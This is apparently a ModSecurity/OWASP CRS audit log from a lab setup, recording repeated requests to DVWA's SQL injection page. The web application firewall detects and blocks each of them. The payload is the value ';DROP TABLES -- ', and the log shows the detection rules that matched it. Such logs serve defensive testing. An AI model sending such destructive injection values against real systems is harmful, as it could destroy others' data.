{"transaction":{"time":"13/May/2017:12:39:49 --0400","transaction_id":"WRc21X8AAQEAAAmHBJ8AAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=95","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21X8AAQEAAAmHBJ8AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21X8AAQEAAAmHBJ8AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21X8AAQEAAAmHBJ8AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21X8AAQEAAAmHBJ8AAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":587,"p2":3290,"p3":0,"p4":0,"p5":219,"sr":27,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:50 --0400","transaction_id":"WRc21n8AAQEAAAmHBKAAAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=94","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21n8AAQEAAAmHBKAAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21n8AAQEAAAmHBKAAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21n8AAQEAAAmHBKAAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21n8AAQEAAAmHBKAAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":521,"p2":2383,"p3":0,"p4":0,"p5":146,"sr":19,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:52 --0400","transaction_id":"WRc22H8AAQEAAAmHBKEAAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=93","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc22H8AAQEAAAmHBKEAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc22H8AAQEAAAmHBKEAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc22H8AAQEAAAmHBKEAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc22H8AAQEAAAmHBKEAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":414,"p2":2600,"p3":0,"p4":0,"p5":174,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:03 --0400","transaction_id":"WRc24n8AAQEAAAkW4SAAAAAB","remote_address":"127.0.0.1","remote_port":42184,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:38:35 GMT","If-None-Match":"\"26d-54f6a7404e88e\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:40:00 GMT","ETag":"\"294-54f6a791bc669\"","Accept-Ranges":"bytes","Content-Length":"660","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc24n8AAQEAAAkW4SAAAAAB\"]"],"stopwatch":{"p1":433,"p2":1168,"p3":58,"p4":171,"p5":52,"sr":20,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:03 --0400","transaction_id":"WRc2438AAQEAAAkW4SEAAAAB","remote_address":"127.0.0.1","remote_port":42184,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2438AAQEAAAkW4SEAAAAB\"]"],"stopwatch":{"p1":384,"p2":892,"p3":43,"p4":362,"p5":49,"sr":19,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
